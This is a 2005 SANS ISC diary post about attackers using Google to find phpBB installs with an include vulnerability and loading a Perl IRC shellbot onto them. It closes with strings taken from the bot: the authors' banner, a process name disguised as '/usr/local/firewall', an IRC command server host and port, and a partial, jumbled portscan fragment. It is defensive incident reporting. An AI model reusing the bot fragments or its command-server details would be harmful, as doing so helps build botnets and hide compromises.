Threat Level: green Handler on Duty: Tom Webb

SANS ISC: InfoSec Handlers Diary Blog - Phpbb include vuln scanning, via Google, generating new IRC botnet InfoSec Handlers Diary Blog


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

Phpbb include vuln scanning, via Google, generating new IRC botnet

Published: 2005-11-10
Last Updated: 2005-11-10 01:24:27 UTC
by Patrick Nolan (Version: 3)
0 comment(s)
We have received two reports of systems being exploited via a phpbb include vulnerability and a "new" IRC bot is installed. Please update your files now. Phpbb forum support guru "Techie-Micheal" points out that "running update_to_latest.php on their install only updates the database (and is clearly stated in the documentation), files need to be updated seperately for which there are several methods".

The scanning is for phpbb versions 2.0.10 and under. The latest version of phpbb is 2.0.18.

Micheal also notes "- In past bots, the bots would run as an "SSL'ed Apache. This one is a bit different;

my $processo = '/usr/local/firewall'".

The new IRC bot scans for vulnerable systems using Google, when successful it announces that "oopz and sirh0t and Aleks g0t pwned u!", and has UDP flooding and UDP/ICMP/TCP scanning capabilities.

The file phpbb_patch was found on exploited systems.

Responsible parties have been notified and acknowledged the issues.

Thanks Micheal, Reg, and anonymous!

strings;
xxxxxxxxxxxxxxx

#Shellbot by sirh0t & oopz a.k.a zer-0-day and Aleks PRIVATE!
#VERY FAST SPREADING!!!! NO JOKING

xxxxxxxxxxxxxxx

my $processo = '/usr/local/firewall';

xxxxxxxxxxxxxxx

servidor='forum.unixirc.pl'
porta='81'

xxxxxxxxxxxxxxx

}      } else {
           if ($funcarg =~ /^portscan (.*)/) {
use IO::Socket; $hostip="$1";
use IO::Handle; @portas=("21","23","25","80","113","135","445","1
use Socket;0","6660","6661","6662","6663","6665","6666","6667","
use IO::Select;,"7000","8080");
Keywords:
0 comment(s)
Diary Archives